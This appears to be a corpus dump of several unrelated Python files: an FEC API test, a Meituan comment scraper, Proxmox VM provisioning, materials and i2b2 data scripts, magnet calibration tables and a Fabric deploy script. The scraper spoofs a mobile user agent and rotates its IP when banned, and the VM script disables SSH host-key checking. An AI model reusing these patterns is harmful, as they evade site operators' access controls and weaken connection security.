            factories.ScheduleBFactory(disbursement_amount=50),
            factories.ScheduleBFactory(disbursement_amount=100),
            factories.ScheduleBFactory(disbursement_amount=150),
            factories.ScheduleBFactory(disbursement_amount=200),
        ]
        results = self._results(api.url_for(ScheduleBView, min_amount=100))
        self.assertTrue(all(each['disbursement_amount'] >= 100 for each in results))
        results = self._results(api.url_for(ScheduleBView, max_amount=150))
        self.assertTrue(all(each['disbursement_amount'] <= 150 for each in results))
        results = self._results(api.url_for(ScheduleBView, min_amount=100, max_amount=150))
        self.assertTrue(all(100 <= each['disbursement_amount'] <= 150 for each in results))

    def test_amount_sched_e(self):
        """min/max amount filters on Schedule E expenditures."""
        [
            factories.ScheduleEFactory(expenditure_amount=50),
            factories.ScheduleEFactory(expenditure_amount=100),
            factories.ScheduleEFactory(expenditure_amount=150),
            factories.ScheduleEFactory(expenditure_amount=200),
        ]
        results = self._results(api.url_for(ScheduleEView, min_amount=100))
        self.assertTrue(all(each['expenditure_amount'] >= 100 for each in results))
        # FIX: these two queries previously hit ScheduleAView (copy-paste from
        # test_amount_sched_a), whose results have no 'expenditure_amount'
        results = self._results(api.url_for(ScheduleEView, max_amount=150))
        self.assertTrue(all(each['expenditure_amount'] <= 150 for each in results))
        results = self._results(api.url_for(ScheduleEView, min_amount=100, max_amount=150))
        self.assertTrue(all(100 <= each['expenditure_amount'] <= 150 for each in results))
| StarcoderdataPython |
1752663 | import constants
import json
import requests
import pickle
import time
import re,sys
import string
from ip_modifier import change_ip
# Result codes returned in the msg field of real_crawl_poi_comment().
CRAWL_SUCCESS = 0
IP_BANNED = -1       # Meituan rejected the request (body code 406) — rotate IP
OTHER_EXCEPTION = 1  # any other failure — retry without changing IP
class comment_crawler:
    """Crawls user comments for one Meituan POI, rotating the outbound IP
    (via change_ip) when the crawler appears to be banned."""

    poi_id = 0
    disable_cnt = 0

    def __init__(self, poi_id):
        self.poi_id = poi_id

    def real_crawl_poi_comment(self):
        """Fetch one batch of comments for this POI.

        Returns (success, msg, comments) where msg is CRAWL_SUCCESS,
        IP_BANNED (response body carries code 406), or OTHER_EXCEPTION.
        """
        success = True
        msg = CRAWL_SUCCESS
        url = constants.meituan_comment
        headers = {
            "User-Agent" : "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36",
            "Referer" : "https://meishi.meituan.com/i/",
            "Accept" : "application/json",
            "Content-Type" : "application/json",
            "x-requested-with" : "XMLHttpRequest"
        }
        data = json.dumps({
            "poiId": self.poi_id
        })
        ret = []
        r = None  # so the except path cannot hit an unbound name if post() raises
        try:
            r = requests.post(url, headers = headers, data = data)
            return_msg = json.loads(r.text)
            status = dict(return_msg)['status']
            if status != 0:
                raise Exception("+++++comment: return status is not 0+++++")
            data_list = list(dict(dict(return_msg)['data'])['list'])
            ret = data_list
        except Exception as e:
            print("=====exception occurs when crawling comments=====")
            print("=====the exception reason=====")
            print(e)
            success = False
            # Default to OTHER_EXCEPTION; only report IP_BANNED when the
            # response body explicitly carries code 406. (Previously every
            # failure defaulted to IP_BANNED, forcing needless IP rotations,
            # and OTHER_EXCEPTION was never used.)
            msg = OTHER_EXCEPTION
            if r is not None:
                print("=====exception message=====")
                print(r.text)
                try:
                    jsn = json.loads(r.text)
                except ValueError:
                    jsn = None  # non-JSON error page
                if isinstance(jsn, dict) and jsn.get('code') == 406:
                    msg = IP_BANNED
        return success, msg, ret

    def crawl_poi_comment(self):
        """Call real_crawl_poi_comment with up to 10 retries, changing the
        outbound IP whenever a ban is detected. Returns the comment list
        (possibly empty)."""
        ret = []
        disable_cnt = 0
        while True:
            success_label, msg, ret = self.real_crawl_poi_comment()
            if success_label:
                break
            disable_cnt += 1
            if msg == IP_BANNED:
                change_ip()  # rotate the outbound IP before retrying
            time.sleep(7)
            print("=====comment crawl: retry count %d=====" % disable_cnt)
            if disable_cnt > 10:
                break
        return ret
| StarcoderdataPython |
227619 | <filename>ec2_functions.py
import proxmox_api
import time
import paramiko
import json
import pexpect
# import subprocess
# from subprocess import Popen, PIPE, check_call
def vm_copy_and_setup(public_key, proxmox, vm_id):
    """Clone the template VM (id 102), install *public_key* for SSH access,
    disable password authentication, and move the VM to the external network.

    NOTE(review): polling loops below rely on fixed sleeps and have no
    timeout — a stuck VM blocks forever. The template password is a
    dataset-redacted placeholder (bytes literal); paramiko/pexpect normally
    expect a str here — confirm before use.
    """
    proxmox.clone_vm("pve", 102, vm_id)
    ready = False
    #Wait until the vm is done cloning before continuing
    # NOTE(review): readiness is declared when a "lock" key APPEARS in the
    # status — a lock usually means the task is still running; confirm this
    # condition is not inverted.
    while(not ready):
        data = proxmox.get_vm_status("pve", vm_id)
        if data is not None:
            data = data["data"]
            if "lock" in data:
                ready = True
        time.sleep(20)
    #standard login info for the vm template
    username = "test"
    password = b"<PASSWORD>"
    time.sleep(150)
    ready = False
    proxmox.start_vm("pve", vm_id)
    # Keep issuing start requests until the node reports the VM running.
    while(not ready):
        proxmox.start_vm("pve", vm_id)
        data = proxmox.get_vm_status("pve", vm_id)
        if data is not None and data["data"] is not None:
            data = data["data"]
            if data["status"] == "running":
                ready = True
        time.sleep(20)
    # Poll until the guest agent reports an IP address.
    vm_ip = proxmox.get_vm_ip_addr("pve", vm_id)
    while vm_ip == False:
        time.sleep(10)
        vm_ip = proxmox.get_vm_ip_addr("pve", vm_id)
    time.sleep(100)
    ssh_session = paramiko.SSHClient()
    ssh_session.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh_session.connect(vm_ip, username=username, password=password)
    ready = False
    # Reconnect until the SSH transport is actually active.
    while(not ready):
        ssh_session.connect(vm_ip, username=username, password=password)
        time.sleep(20)
        if ssh_session.get_transport() is not None:
            if ssh_session.get_transport().is_active():
                ready = True
    # Prepare ~/.ssh and write the caller's public key locally for scp.
    ssh_session.exec_command("mkdir -p ~/.ssh/")
    ssh_session.exec_command("chown -R test:test .ssh")
    key_file = open("authorized_keys", "w")
    key_file.write(public_key)
    key_file.close()
    #Copy ssh key
    p = pexpect.spawn("scp -o StrictHostKeyChecking=no authorized_keys test@%s:/home/test/.ssh/authorized_keys"%vm_ip)
    p.expect("test@.*'s password:.*")
    p.sendline(password)
    time.sleep(10)
    p.close()
    # Lock down SSH to key-only authentication.
    ssh_session.exec_command("sudo sed -i -e 's/PasswordAuthentication yes/PasswordAuthentication no/g' /etc/ssh/sshd_config")
    ssh_session.close()
    #Switch to the external internet facing network
    proxmox.change_network("pve", vm_id, "vmbr0")
    time.sleep(30)
    # Reboot so the new network config takes effect.
    proxmox.stop_vm("pve", vm_id)
    while proxmox.get_vm_status("pve", vm_id)["data"]["status"] != "stopped":
        time.sleep(10)
    proxmox.start_vm("pve", vm_id)
def get_info(proxmox, vm_id):
    """Return a JSON string {"status": ..., "ip": ...} for the VM, or False
    when its IP address cannot be determined yet."""
    status = ""
    status_response = proxmox.get_vm_status("pve", vm_id)
    if "data" in status_response and "status" in status_response["data"]:
        status = status_response["data"]["status"]
    ip = proxmox.get_vm_ip_addr("pve", vm_id)
    if ip == False:
        return False
    return json.dumps({"status": status, "ip": ip})
def delete_vm(proxmox, vm_id):
    """Stop the VM, wait until the node reports it stopped, then delete it
    and return the deletion response."""
    proxmox.stop_vm("pve", vm_id)
    # poll every 10s until the VM reports the stopped state
    status = proxmox.get_vm_status("pve", vm_id)["data"]["status"]
    while status != "stopped":
        time.sleep(10)
        status = proxmox.get_vm_status("pve", vm_id)["data"]["status"]
    return proxmox.delete_vm("pve", vm_id)
| StarcoderdataPython |
1740848 | # -*- coding: utf-8 -*-
import os
import json
from pymatgen import MPRester
# Build a task_id -> pretty_formula lookup over every entry in the Materials
# Project database and dump it as formulae.json next to this script.
data = {}
with MPRester() as mpr:
    # enumerate index `i` is currently unused (kept for debugging/progress)
    for i, d in enumerate(
        mpr.query(criteria={}, properties=["task_ids", "pretty_formula"])
    ):
        # a material may have several task ids; map each to the same formula
        for task_id in d["task_ids"]:
            data[task_id] = d["pretty_formula"]
out = os.path.join(os.path.dirname(__file__), "formulae.json")
with open(out, "w") as f:
    json.dump(data, f)
| StarcoderdataPython |
3582971 | <reponame>CHUV-DS/RDF-i2b2-converter<filename>src/scripts/merge_metavaluefields.py<gh_stars>0
import os
import sys
import pandas as pd
import pdb
import json
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath)
# Declarative description of the C_METADATAXML migrations performed by
# merge_metadatavaluefields(): for each short-URI key to digest, the owning
# concept, the destination path(s) in the ontology ("." = the concept row
# itself, a trailing "/*" = all modifier children of that path), and the
# value type forced into the XML <DataType> element.
MIGRATIONS = {
    "swissbioref:hasLabResultValue" : {
        "concept":"sphn:LabResult",
        "destination": ["swissbioref:hasLabResultLabTestCode/*"],
        "xmlvaluetype":"Float"
    },
    "sphn:hasDateTime":{
        "concept":"sphn:BirthDate",
        "destination":["."],
        "xmlvaluetype":"Integer"
    },
    "sphn:hasBodyWeightValue":{
        "concept":"sphn:BodyWeight",
        "destination":["."],
        "xmlvaluetype":"PosFloat"
    },
    # NOTE(review): key suffixed with "FAIL" — presumably disabled on purpose
    # so it never matches a real element; confirm before re-enabling.
    "swissbioref:hasAgeValueFAIL":{
        "concept":"sphn:Biosample",
        "destination":["swissbioref:hasSubjectAge\swissbioref:Age"],
        "xmlvaluetype":"PosFloat"
    }
}
def extract_parent_id(row):
    """Return the short URI of the parent element for an i2b2 ontology row.

    Reads C_PATH when present, otherwise falls back to M_APPLIED_PATH, and
    extracts the last backslash-delimited component before the trailing
    backslash.
    """
    source = "M_APPLIED_PATH" if pd.isnull(row["C_PATH"]) else "C_PATH"
    extracted = row[[source]].str.extract(r'.*\\([^\\]+)\\')
    return extracted[0][source]
def resolve_rows(df, destdic):
    """
    Return the index of rows in *df* targeted by a migration descriptor.

    The "destination" field of *destdic* is a list of paths pointing to
    destination elements:
      - "."  selects the concept row itself,
      - a path containing "/*" selects all modifier children below it,
      - any other path is matched exactly (wrapped in backslashes) among the
        modifiers applied to the concept.
    Returns an empty index when the concept row is not in CONCEPT_DIMENSION.
    Raises when several rows match the concept.
    """
    destination = destdic["destination"]
    conc = destdic["concept"]
    conc_row = df.loc[df["C_FULLNAME"].str.contains(conc)]
    if len(conc_row.index) > 1:
        raise Exception("Several matches for migration destination of destdic")
    res_idx = pd.Index([])
    if conc_row["C_TABLENAME"].values[0] != "CONCEPT_DIMENSION":
        return res_idx
    for path in destination:
        if path == ".":
            idces = conc_row
        elif "*" in path:
            npath = path[:path.find("/*")]
            idces = df.loc[df["C_FULLNAME"].str.contains(npath) & df["M_APPLIED_PATH"].str.contains(conc)]
        else:
            # FIX: parenthesize the equality — `&` binds tighter than `==`,
            # so the original applied `&` to a plain string and a Series
            # before the comparison ever happened.
            idces = df.loc[(df["C_FULLNAME"] == ("\\" + path + "\\")) & df["M_APPLIED_PATH"].str.contains(conc)]
        res_idx = res_idx.union(idces.index)
    return res_idx
def merge_metadatavaluefields(output_tables_loc):
    """Fold the C_METADATAXML value definitions of the ontology entries
    listed in MIGRATIONS into their destination rows, drop the digested
    rows, and rewrite METADATA.csv in place.

    A mapping of digested basecodes to the basecodes that received their
    XML is written to migrations_logs.json in the output directory.
    """
    # NOTE(review): module-level state is injected via globals(); consider
    # passing these paths explicitly instead.
    globals()["OUTPUT_TABLES_LOCATION"] = output_tables_loc
    globals()["METADATA_LOC"] = output_tables_loc + "METADATA.csv"
    logs = {}
    df = pd.read_csv(METADATA_LOC)
    # get the shortened URI that trails the full path
    dfk = df.assign(key=df["C_FULLNAME"].str.extract(r'.*\\([^\\]+)\\'))
    # get the positions of the lines to be deleted and digested into other lines
    to_digest = dfk.loc[dfk["C_METADATAXML"].notnull() & dfk["key"].isin(MIGRATIONS.keys())]
    values = pd.DataFrame(columns=["C_METADATAXML"])  # NOTE(review): unused
    moved = pd.Index([])
    for ix, row in to_digest.iterrows():
        destdic = MIGRATIONS[row["key"]]
        # Check it's the good item related to the good parent
        if destdic["concept"] != extract_parent_id(row):
            print("Concept does not match at ", destdic["concept"], "could not migrate")
            continue
        # find out which rows should receive this xml
        destination_indexes = resolve_rows(dfk[["C_FULLNAME", "C_PATH", "M_APPLIED_PATH", "C_TABLENAME"]], destdic)
        if len(destination_indexes) == 0:
            continue
        # change type if necessary in the xml frame
        if "xmlvaluetype" in destdic.keys():
            # overwrite the <DataType> element content with the declared type
            xmls = row[["C_METADATAXML"]].str.replace("(?<=<DataType>).*?(?=<\/DataType>)", destdic["xmlvaluetype"], regex=True)
            xml = xmls["C_METADATAXML"]
        else:
            xml = row["C_METADATAXML"]
        logs.update({row["C_BASECODE"]: df.loc[destination_indexes, "C_BASECODE"].tolist()})
        # For each found index, store it into the temporary table
        df.loc[destination_indexes, "C_METADATAXML"] = xml
        moved = moved.union([ix])
    # drop the digested source rows and persist
    df = df.drop(moved)
    df.to_csv(METADATA_LOC, index=False)
    with open(OUTPUT_TABLES_LOCATION + 'migrations_logs.json', 'w') as outfile:
        json.dump(logs, outfile)
| StarcoderdataPython |
3521847 | <filename>data_mgmt/generate_data.py<gh_stars>0
# -*- coding: utf-8 -*-
from fn_utils import make_fn_name, make_fn_desc
from fn_utils import make_row, flip_data_str_signs
from fn_utils import write_row
from ESD.data._utils import generate_func_string
from fn_data import C1_xdata, C1_ydata
from fn_data import C2_xdata, C2_ydata
from fn_data import C3_xdata, C3_ydata
from fn_data import C4_xdata, C4_ydata
from fn_data import C4S4_xdata, C4S4_ydata
from fn_data import C9Q10_xdata, C9Q10_ydata
from fn_data import C_S1_xdata, C_S1_ydata
from fn_data import C_S2_xdata, C_S2_ydata
from fn_data import S1_xdata, S1_ydata
from fn_data import S2_xdata, S2_ydata
from fn_data import S4_xdata, S4_ydata
from fn_data import H3_xdata, H3_ydata
from fn_data import H1_xdata, H1_ydata
from fn_data import Q1_xdata, Q1_ydata
from fn_data import Q1_xdata_, Q1_ydata_
from fn_data import Q2_xdata, Q2_ydata
from fn_data import Q2_xdata_, Q2_ydata_
from fn_data import Q3_xdata, Q3_ydata
from fn_data import Q4_xdata, Q4_ydata
from fn_data import Q5_xdata, Q5_ydata
from fn_data import Q6_xdata, Q6_ydata
from fn_data import Q6_xdata_, Q6_ydata_
from fn_data import Q8_xdata, Q8_ydata
from fn_data import Q9_xdata, Q9_ydata
from fn_data import QUAD_FSQ1_xdata, QUAD_FSQ1_ydata
from fn_data import QUAD_FSQ2_xdata, QUAD_FSQ2_ydata
from fn_data import QUAD_FSQ5_xdata, QUAD_FSQ5_ydata
from fn_data import BEND_FSD1_SCD1_xdata, BEND_FSD1_SCD1_ydata
from fn_data import BEND_FSD1_SCD2_xdata, BEND_FSD1_SCD2_ydata
from fn_data import SEXT_FSQ2_xdata, SEXT_FSQ2_ydata
from fn_data import SEXT_FSQ5_xdata, SEXT_FSQ5_ydata
from fn_data import OCT_FSQ2_xdata, OCT_FSQ2_ydata
from fn_data import OCT_FSQ5_xdata, OCT_FSQ5_ydata
from fn_templates import fn_prop, fn_prop_reversed
from fn_templates import fn_quad, fn_quad_reversed, fn_quad_
from fn_egroups import C1_elements, C2_elements, C3_elements, \
C4_elements, C4S4_elements, \
C_S1_elements, C_S2_elements, C9Q10_elements
from fn_egroups import Q1_elements, Q1_elements_, \
Q2_elements, Q2_elements_, \
Q3_elements_, \
Q4_elements, \
Q5_elements_, \
Q6_elements, Q6_elements_, \
Q8_elements, Q9_elements
from fn_egroups import S1_elements, S2_elements, S4_elements
from fn_egroups import H1_elements, H1_elements_, H3_elements_
from fn_egroups import BEND_FSD1_SCD1_elements, BEND_FSD1_SCD2_elements
from fn_egroups import QUAD_FSQ1_elements
from fn_egroups import QUAD_FSQ2_elements, SEXT_FSQ2_elements, OCT_FSQ2_elements
from fn_egroups import QUAD_FSQ5_elements, SEXT_FSQ5_elements, OCT_FSQ5_elements
def make_rows_COR_SOL(ename, k, xdata, ydata,
                      params="x,k", phy_field="TM", eng_field="I",
                      dtype="COR", **kws):
    """Build the engineering<->physics conversion rows for a corrector or
    solenoid element.

    The coefficient *k* and the (xdata, ydata) tables are defined for the
    vertical corrector; for horizontal correctors ('DCH' in the element
    name, dtype "COR") the sign of k is flipped — or taken from the optional
    ``k_`` keyword — and the y-data signs are flipped to match.
    """
    if dtype == "COR" and 'DCH' in ename:
        k = kws.get('k_', -k)
        ydata = flip_data_str_signs(ydata)
    forward_code = fn_prop.format(k=k)
    backward_code = fn_prop_reversed.format(k=k)
    return [
        make_row(ename, phy_field, eng_field, False, forward_code, params, xdata, ydata, **kws),
        make_row(ename, phy_field, eng_field, True, backward_code, params, ydata, xdata, **kws),
    ]
def make_rows_QUAD(ename, xdata, ydata,
                   params="x,x1,a1,b1,c1,a2,b2,c2",
                   phy_field="B2", eng_field="I", **kws):
    """Build rows for a quadrupole described by a piecewise fit.

    The fit is linear (a1, b1, c1) below the breakpoint x1 and quadratic
    (a2, b2, c2) above it; ``polarity`` (default 1) selects the template for
    positive or negative magnets.  When ``x1r`` is None no reversed
    (physics -> engineering) row is produced.
    """
    x1 = kws.pop('x1')
    x1r = kws.pop('x1r')
    coeffs = {name: kws.pop(name) for name in ('a1', 'b1', 'c1', 'a2', 'b2', 'c2')}
    polarity = kws.pop('polarity', 1)
    template = fn_quad if polarity == 1 else fn_quad_
    code_e2p = template.format(x1=x1, **coeffs)
    row_e2p = make_row(ename, phy_field, eng_field, False,
                       code_e2p, params, xdata, ydata, **kws)
    if x1r is None:
        row_p2e = None
    else:
        code_p2e = fn_quad_reversed.format(x1=x1r, **coeffs)
        row_p2e = make_row(ename, phy_field, eng_field, True,
                           code_p2e, params, ydata, xdata, **kws)
    return [row_e2p, row_p2e]
# create rows with a function string generated from the tabulated data
def make_rows_sf(ename, xdata, ydata,
                 params="x", phy_field="B", eng_field="I",
                 dtype="BEND", **kws):
    """Build the forward/reverse row pair whose conversion code is produced
    directly from the whitespace-separated (x, y) calibration strings via
    generate_func_string()."""
    xs = [float(value) for value in xdata.split()]
    ys = [float(value) for value in ydata.split()]
    code_e2p, code_p2e = generate_func_string(xs, ys)
    rows = [
        make_row(ename, phy_field, eng_field, False,
                 code_e2p, params, xdata, ydata, **kws),
        make_row(ename, phy_field, eng_field, True,
                 code_p2e, params, ydata, xdata, **kws),
    ]
    return rows
##############################################################################
# Accumulated (row_content, colour) pairs; written to the spreadsheet below.
all_rows = []
# xlwt.Style.colour_map
COLOR_COR = "light_yellow"
COLOR_SOL = "light_turquoise"
COLOR_QUAD = "light_green"
COLOR_SEXT = "light_blue"
COLOR_OCT = "light_orange"
COLOR_BEND = "yellow"
### correctors: one proportional coefficient k per magnet family
k_C1 = 4.682E-05
for e in C1_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C1, xdata=C1_xdata, ydata=C1_ydata, color=COLOR_COR))
k_C2 = 4.232e-4
k_C2_ = -1.970e-4
for e in C2_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C2, xdata=C2_xdata, ydata=C2_ydata, color=COLOR_COR,
                                      k_=k_C2_))
k_C3 = 8.76e-5
for e in C3_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C3, xdata=C3_xdata, ydata=C3_ydata, color=COLOR_COR))
k_C4 = 3.484e-4
for e in C4_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C4, xdata=C4_xdata, ydata=C4_ydata, color=COLOR_COR))
k_C4S4 = 2.598e-4
for e in C4S4_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C4S4, xdata=C4S4_xdata, ydata=C4S4_ydata, color=COLOR_COR))
k_C9Q10 = 0.950e-4
for e in C9Q10_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C9Q10, xdata=C9Q10_xdata, ydata=C9Q10_ydata, color=COLOR_COR))
k_C_S1 = 1.554e-3
for e in C_S1_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C_S1, xdata=C_S1_xdata, ydata=C_S1_ydata, color=COLOR_COR))
k_C_S2 = 2.900e-3
for e in C_S2_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_C_S2, xdata=C_S2_xdata, ydata=C_S2_ydata, color=COLOR_COR))
### solenoids: proportional B <-> I fits
k_S4 = -2.89e-3
for e in S4_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_S4, xdata=S4_xdata, ydata=S4_ydata,
                                      phy_field="B", eng_field="I", dtype="SOL", color=COLOR_SOL))
k_S1 = -7.431e-2
for e in S1_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_S1, xdata=S1_xdata, ydata=S1_ydata,
                                      phy_field="B", eng_field="I", dtype="SOL", color=COLOR_SOL))
k_S2 = -8.115e-2
for e in S2_elements:
    all_rows.extend(make_rows_COR_SOL(e, k=k_S2, xdata=S2_xdata, ydata=S2_ydata,
                                      phy_field="B", eng_field="I", dtype="SOL", color=COLOR_SOL))
### quadrupoles
# Q1
# Piecewise fit coefficients: linear (a1,b1,c1) below x1, quadratic above.
x1 = 244.370393236
x1r = None
a1 = 0
b1 = 0.118585750045
c1 = 0
a2 = -16.6039297722
b2 = 0.254477251076
c2 = -0.000278044118257
for e in Q1_elements:
    # Forward (I -> B2) row from the piecewise fit; reversed (B2 -> I) row
    # from the simple proportional fit with slope b1 (x1r is None above).
    row_e2p, _ = make_rows_QUAD(e, xdata=Q1_xdata, ydata=Q1_ydata,
                                x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2, color=COLOR_QUAD)
    _, row_p2e = make_rows_COR_SOL(e, k=b1, xdata=Q1_ydata, ydata=Q1_xdata, phy_field="B2", eng_field="I",
                                   dtype='QUAD', color=COLOR_QUAD)
    all_rows.extend([row_e2p, row_p2e])
for e in Q1_elements_:
    row_e2p, _ = make_rows_QUAD(e, xdata=Q1_xdata_, ydata=Q1_ydata_,
                                x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2,
                                polarity=-1, color=COLOR_QUAD)
    # NOTE(review): this reversed row uses Q1_ydata/Q1_xdata, not the
    # "_"-suffixed negative-polarity data used two lines above -- confirm
    # this asymmetry is intentional.
    _, row_p2e = make_rows_COR_SOL(e, k=-b1, xdata=Q1_ydata, ydata=Q1_xdata, phy_field="B2", eng_field="I",
                                   dtype='QUAD', color=COLOR_QUAD)
    all_rows.extend([row_e2p, row_p2e])
# Q2
k_Q2 = 0.1061
for e in Q2_elements:
    all_rows.extend(make_rows_COR_SOL(
        e, k=k_Q2, xdata=Q2_xdata, ydata=Q2_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
for e in Q2_elements_:
    all_rows.extend(make_rows_COR_SOL(
        e, k=-k_Q2, xdata=Q2_xdata_, ydata=Q2_ydata_,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q3
k_Q3 = 0.10373
for e in Q3_elements_:
    all_rows.extend(make_rows_COR_SOL(
        e, k=-k_Q3, xdata=Q3_xdata, ydata=Q3_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q4
k_Q4 = 8.9697E-02
for e in Q4_elements:
    all_rows.extend(make_rows_COR_SOL(
        e, k=k_Q4, xdata=Q4_xdata, ydata=Q4_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q5
k_Q5 = 8.6750E-02
for e in Q5_elements_:
    all_rows.extend(make_rows_COR_SOL(
        e, k=-k_Q5, xdata=Q5_xdata, ydata=Q5_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q6
k_Q6 = 0.0548
for e in Q6_elements:
    all_rows.extend(make_rows_COR_SOL(
        e, k=k_Q6, xdata=Q6_xdata, ydata=Q6_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
for e in Q6_elements_:
    all_rows.extend(make_rows_COR_SOL(
        e, k=-k_Q6, xdata=Q6_xdata_, ydata=Q6_ydata_,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q8: piecewise fit with a real reversed breakpoint x1r.
x1 = 89.6413014892835
x1r = 13.645592213
a1 = 0
b1 = 0.150213016296429
c1 = 0.0000224379963267202
a2 = -5.11759906727964
b2 = 0.264392506827174
c2 = -0.000614430771940742
for e in Q8_elements:
    all_rows.extend(make_rows_QUAD(e, xdata=Q8_xdata, ydata=Q8_ydata,
                                   x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2, color=COLOR_QUAD))
# Q9
x1 = 106.83602341739
x1r = -16.2642546626
a1 = 0
b1 = -0.151630162046015
c1 = -0.00000566773110230994
a2 = 7.29509238929589
b2 = -0.288196315595088
c2 = 0.00063347134006815
for e in Q9_elements:
    all_rows.extend(make_rows_QUAD(e, xdata=Q9_xdata, ydata=Q9_ydata,
                                   x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2, color=COLOR_QUAD))
# H3 (sextupoles)
k_H3 = 5.48
for e in H3_elements_:
    all_rows.extend(make_rows_COR_SOL(
        e, k=-k_H3, xdata=H3_xdata, ydata=H3_ydata,
        phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# H1
k_H1 = 15
for e in H1_elements:
    all_rows.extend(make_rows_COR_SOL(
        e, k=k_H1, xdata=H1_xdata, ydata=H1_ydata,
        phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
for e in H1_elements_:
    all_rows.extend(make_rows_COR_SOL(
        e, k=-k_H1, xdata=H1_xdata, ydata=H1_ydata,
        phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# ARIS: rows generated from tabulated data via make_rows_sf.
# BEND_FSD1_SCD1
for e in BEND_FSD1_SCD1_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=BEND_FSD1_SCD1_xdata, ydata=BEND_FSD1_SCD1_ydata,
        phy_field="B", eng_field="I", dtype='BEND', color=COLOR_BEND))
# BEND_FSD1_SCD2
for e in BEND_FSD1_SCD2_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=BEND_FSD1_SCD2_xdata, ydata=BEND_FSD1_SCD2_ydata,
        phy_field="B", eng_field="I", dtype='BEND', color=COLOR_BEND))
# QUAD_FSQ1
for e in QUAD_FSQ1_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=QUAD_FSQ1_xdata, ydata=QUAD_FSQ1_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# QUAD_FSQ2
for e in QUAD_FSQ2_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=QUAD_FSQ2_xdata, ydata=QUAD_FSQ2_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# QUAD_FSQ5
for e in QUAD_FSQ5_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=QUAD_FSQ5_xdata, ydata=QUAD_FSQ5_ydata,
        phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# SEXT_FSQ2
for e in SEXT_FSQ2_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=SEXT_FSQ2_xdata, ydata=SEXT_FSQ2_ydata,
        phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# SEXT_FSQ5
for e in SEXT_FSQ5_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=SEXT_FSQ5_xdata, ydata=SEXT_FSQ5_ydata,
        phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# OCT_FSQ2 (octupoles)
for e in OCT_FSQ2_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=OCT_FSQ2_xdata, ydata=OCT_FSQ2_ydata,
        phy_field="B4", eng_field="I", dtype='OCT', color=COLOR_OCT))
# OCT_FSQ5
for e in OCT_FSQ5_elements:
    all_rows.extend(make_rows_sf(
        e, xdata=OCT_FSQ5_xdata, ydata=OCT_FSQ5_ydata,
        phy_field="B4", eng_field="I", dtype='OCT', color=COLOR_OCT))
##############################################################################
# write to xls
output_filename = 'unicorn-data-new.xls'
from xlwt import Workbook
from xlwt import XFStyle, easyxf, Pattern, Style
# new workbook
book = Workbook(encoding='utf-8')
# new sheet
sheet1 = book.add_sheet('Functions')
# header
header = ('name', 'ename', 'from_field', 'to_field', 'description', 'args', 'code', 'data_x', 'data_y')
# write header
header_style = easyxf('font: name Arial, bold True, color blue, height 240; borders: bottom thin;')
write_row(sheet1, header, 0, style=header_style)
# write all rows into sheet1, colouring each row by its magnet type
for idx, r in enumerate(all_rows, 1):
    row_content, color = r
    style, pattern = XFStyle(), Pattern()
    pattern.pattern = Pattern.SOLID_PATTERN
    pattern.pattern_fore_colour = Style.colour_map[color]
    style.pattern = pattern
    write_row(sheet1, row_content, idx, style=style)
# save as a file
book.save(output_filename)
| StarcoderdataPython |
6505561 | from fabric.api import *
#
# Configurations
#
master_ip = '172.16.58.3'  # public address of the master node
slave_ip = '192.168.127.12'  # public address of the slave node
env.user = 'ubuntu'  # SSH user for all fabric tasks
env.key_filename = '/home/keys/key.pem'  # SSH private key used by fabric
local_ip_list =[]  # filled host-by-host by get_local_ip()
env.hosts = [master_ip, slave_ip]
@parallel
@with_settings(warn_only=True)
def git_checkout():
    """Remove any existing checkout and freshly clone the xuser repo on each host."""
    sudo('rm -Rf xuser')
    run('git clone https://github.com/saltukalakus/xuser')
@parallel
@with_settings(warn_only=True)
def git_pull():
    """Update an existing xuser checkout on each host."""
    with cd('/home/ubuntu/xuser'):
        run('git pull')
@hosts(master_ip)
@with_settings(warn_only=True)
